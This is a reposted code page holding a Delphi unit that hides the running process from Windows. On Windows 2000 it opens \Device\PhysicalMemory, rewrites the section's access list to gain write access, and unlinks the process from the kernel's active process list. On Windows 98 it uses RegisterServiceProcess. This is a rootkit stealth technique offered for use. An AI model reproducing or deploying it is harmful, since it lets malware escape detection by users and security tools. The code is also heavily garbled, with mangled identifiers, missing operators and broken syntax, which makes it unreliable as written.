Process hidden Delphi code (operating PhysicalMemory

xiaoxiao2021-03-14  193

Process hidden Delphi code

Unit UNITHIDEPROCESS;

Interface

Uses

Windows, Messages, Sysutils, Variants, Classes, Graphics, Controls,

Forms, Dialogs, Registry, Comctrls, Strutils, Stdctrls,

Toolwin, Menus, Imglist, Actnlist, Inifiles, Checklst, FileCtrl, ACLAPI,

Accctrl;

Type

NTSTATUS = longint;

Ushort = byte;

Pwstr = pwidechar;

Ulong = cardinal

Handle = POINTER;

Pvoid ​​= POINTER;

PCWSTR = PWIDECHAR;

Pulong = ^ ulong;

HMODULE = THANDLE;

Const

Status_access_denied = $ c0000022;

RSP_SIMPLE_SERVICE = $ 00000001;

Rsp_unregister_service = $ 00000000;

Type

_Unicode_string = record

Length: ushort;

MaximumLength: Ushort;

Buffer: pwstr;

END;

Unicode_string = _unicore_string;

PUNICODE_STRING = ^ _Unicode_string;

_Object_attributes = record

Length: ulong;

Rootdirectory: Handle;

Objectname: punicode_string;

Attributes: ulong;

SecurityDescriptor: PVOID;

SecurityQualityOfService: pvoid;

END;

Object_attributes = _object_attribute;

POBJECT_ATTRIBUTES = ^ _ Object_attribute;

Zwopensection = Function

SectionHandle: Pinteger;

DESIREDACCESS: Access_Mask;

Objectattributes: POBJECT_ATTRIBUTES

: NTSTATUS; STDCALL;

RTLINITUNICODESTRING = Procedure

DestinationString: punicode_string;

SourceString: PCWSTR

STDCALL;

TMYHIDEPROCESS = Class

Private

Osversion: longint;

RTLinitunicodeString: RTLINITUNICODESTRING;

Zwopense: Zwopense;

g_hntdll: hmodule;

g_pmapphysicalmemory: pvoid;

g_hmpm: thandle;

Function initddll (): bool;

Procedure closentdll ();

Procedure SetPhyscialMemorySectionCanbewrite (HSECTION: THANDLE);

Function openphysicalmemory (): thandle;

Function lineArtophys (baseaddress: pulong; addr: pvoid): pvoid;

Function getData (AddR: pvoid): ulong; function setdata (addr: pvoid; data: ulong): BOOL;

Function hideprocess2000 (): bool;

Procedure hideprocess98 ();

public

Constructor Create (Theosver: longint);

DEStructor destroy ();

Procedure dohideme ();

END;

IMPLEMENTATION

Constructor TMYHIDEPROCESS.CREATE (THEOSVER: LongInt);

Begin

Osversion: = theosver;

END;

Destructor TMYHIDEPROCESS.DESTROY ();

Begin

Closentdll ();

END;

Procedure TmyHideProcess.doHideme ();

Begin

Case (Osversion) of

98:

HideProcess98 ();

2000:

HideProcess2000 ();

END;

END;

Function TMYHIDEPROCESS.INITNTDLL (): BOOL;

VAR

a: longint;

Begin

g_hntdll: = 0;

g_pmapphysicalmemory: = nil;

g_hmpm: = 0;

g_hntdll: = loadingLibrary ('NTDLL.DLL');

IF (g_hntdll = 0) THEN

Begin

Result: = FALSE;

EXIT;

END;

@RtlinitunicodeString: =

GetProcaddress (g_hntdll, 'rtLinitUnicodestring');

@Zwopensection: =

GetProcaddress (g_hntdll, 'zwopensection');

RESULT: = TRUE;

END;

Procedure tmyhideprocess.closeTdll ();

Begin

IF (g_hntdll <> 0) THEN

Begin

Freelibrary (g_hntdll);

END;

END;

Procedure TMYHIDEPROCESS.SETPHYSCIALMEMORYSECTIONCANBEWRITED (HSECTION: THANDLE);

Label Cleanup;

VAR

PDACL, PNEWDACL: PACL;

PSD: PPSecurity_Descriptor;

DWRES: DWORD;

EA: EXPLICIT_ACCESS;

Begin

PDACL: = NIL;

PNEWDACL: = NIL;

PSD: = NIL;

DWRES: = GetSecurityInfo (HSECTION, SE_KERNEL_Object, DACL_SECURITY_INFORMATION,

NIL, NIL, PDACL, NIL, PSD);

IF (DWRES <> Error_Success) THEN

Begin

Goto cleanup;

END;

ZeromeMory (@ea, sizeof (expected_access));

Ea.grfaccesspermissions: = section_map_write

Ea.grfaccessmode: = GRANT_ACCESS;

Ea.grfinheritance: = no_inheritance;

Ea.trustee.trusteeform: = trustee_is_name; ele.trustee.trustetype: = trustee_use_user;

Ea.trustee.ptstrname: = 'current_user';

DWRES: = STENTRIESINACL (1, @ EA, PDACL, PNEWDACL);

IF (DWRES <> Error_Success) THEN

Begin

Goto cleanup;

END;

Dwres: = setsecurityInfo (HSECTION, SE_KERNEL_Object, DACL_SECURITY_INFORMATION, NIL, NIL, PNEWDACL, NIL)

IF (DWRES <> Error_Success) THEN

Begin

Goto cleanup;

END;

Cleanup:

IF (PSD <> nil) THEN

LocalFree (Ulong (PSD));

IF (PNewDACL <> nil) THEN

LocalFree (Ulong (PNewDACL);

END;

Function TMYHIDEPROCESS.OpenPhysicalMemory (): thandle;

VAR

Status: NTSTATUS;

Physmemstring: unicode_string;

Attributes: Object_attribute;

Begin

RtlinitunicodeString (@physmemstring, pcwstr ('// device // physicalmemory ");

Attributes.lendth: = sizeof (Object_attributes);

Attributes.rootdirectory: = NIL;

Attributes.Objectname: = @physmemstring;

Attributes.attributes: = 0;

Attributes.securityDescriptor: = nil;

Attributes.securityquality = nil;

Status: = zwopensection (@ g_hmpm, section_map_read or section_map_write, @ attributes);

IF (status = status_access_denied) THEN

Begin

Status: = zwopensection (@ g_hmpm, read_control or write_dac, @ attributes);

SetPhyscialMemorySectionCanbewrite (g_hmpm);

CloseHandle (G_HMPM);

Status: = zwopensection (@ g_hmpm, section_map_read or section_map_write, @ attributes);

END;

If status = 0 THEN

Begin

Result: = 0;

EXIT;

END;

g_pmapphysicalmemory: = MapViewOffile

g_hmpm,

4,

0,

$ 30000,

$ 1000);

IF (g_pmapphysicalmemory = nil) THEN

Begin

Result: = 0;

EXIT;

END;

Result: = g_hmpm;

END;

/ / ------------------------------------------------------------------------------------------------------------------------------------------------------ ------------- Type

Tarrayulong = array [0..0] of ulong;

PTARRAYULONG = ^ tarrayulong;

/ / -------------------------------------------------------------------------------------------- ------------

Function TMYHIDEPROCESS.LINEARTOPHYS (BaseEaddress: pulong; addr: pvoid): PVOID;

VAR

VADDR, PGDE, PTE, PADDR, TMP: ULONG;

_PGDE: Pulong; Begin

Vaddr: = ulong (addr);

PGDE: = ptaRayulong (BaseAddress) ^ [VADDR SHR 22];

IF ((pgde and 1) <> 0) THEN

Begin

TMP: = pgde and $ 00000080;

IF (TMP <> 0) THEN

Begin

Paddr: = (pgde and $ ffc00000) (Vaddr and $ 003FFFF);

end

Else

Begin

PGDE: = Ulong (MapViewoffile (G_HMPM, 4, 0, PGDE AND $ FFFFF000, $ 1000);

_PGDE: = Pulong (PGDE);

PTE: = ptarayulong (_pgde) ^ [(VADDR AND $ 003FF000) SHR 12];

IF ((PTE and 1) <> 0) THEN

Begin

Paddr: = (PTE and $ ffffff000) (VADDR and $ 00000FFF);

UnmapViewOffile (PVOID (PGDE));

end

Else

Begin

Result: = 0;

EXIT;

END;

END;

end

Else

Begin

Result: = 0;

EXIT;

END;

Result: = PVOID (PADDR);

END;

FUNCTION

TMYHIDEPROCESS.GETDATA (AddR: pvoid): Ulong;

VAR

Phys, RET: ULONG;

TMP: Pulong;

Begin

Phys: = Ulong (lineartophys (pulong (g_pmapphysicalmemory), pvoid (addr));

TMP: = Pulong (MapViewoffile (G_HMPM, 4, 0, Phys and $ FFFFF000, $ 1000));

IF (TMP <> nil) THEN

Begin

Result: = 0;

EXIT;

END;

RET: = PTARRAYULONG (TMP) ^ [(Phys and $ FFF) SHR 2];

UnmapViewoffile (TMP);

Result: = Ret;

END;

Function TMYHIDEPROCESS.SETDATA (AddR: pvoid; data: ulong): BOOL

VAR

Phys, RET: ULONG;

TMP: Pulong;

Begin

Phys: = Ulong (lineartophys (pulong (g_pmapphysicalmemory), pvoid (addr));

TMP: = Pulong (MapViewoffile (g_hmpm, file_map_write, 0, phys and $ fffff000, $ 1000));

IF (TMP <> nil) THEN

Begin

Result: = FALSE; EXIT;

END;

PTARRAYULONG (TMP) ^ [(Phys and $ FFF) SHR 2]: = DATA;

UnmapViewoffile (TMP);

RESULT: = TRUE

END;

Function TMYHIDEPROCESS.HIDEPROCESS2000 (): BOOL;

VAR

Thread, Process, FW, BW: ulong;

Begin

ifinitdll () THEN

Begin

IF (OpenPhysicalMemory () = 0) THEN

Begin

Result: = FALSE;

EXIT;

END;

Thread: = GetData (PVOID ($ FFDFF124));

Process: = GetData (PVOID (THREAD $ 22C));

FW: = GetData (PVOID (Process $ A0));

BW: = GetData (PVOID (Process $ A4));

SetData (PVOID (FW 4), BW);

SetDATA (PVOID (BW), FW);

UNMAPVIEWOFFILE (g_pmapphysicalmemory);

CloseHandle (G_HMPM);

Closentdll ();

END;

RESULT: = true;

END;

Procedure TmyhideProcess.hideProcess98 ();

TYPE PREGISTERSERVICE = Function (A, B: DWORD): Boolean; stdcall;

VAR

Hkernel: hmodule;

RegisterService: PregisterService;

Begin

Hkernel: = loadingLibrary ('kernel32.dll');

IF (Hkernel> 0) THEN

Begin

@RegisterService: = getProcaddress (Hkernel, 'registerServiceProcess ");

RegisterService (), RSP_SIMPLE_SERVICE;

Freelibrary (Hkernel);

Hkernel: = 0;

END;

END;

End.

转载请注明原文地址:https://www.9cbs.com/read-129465.html

New Post(0)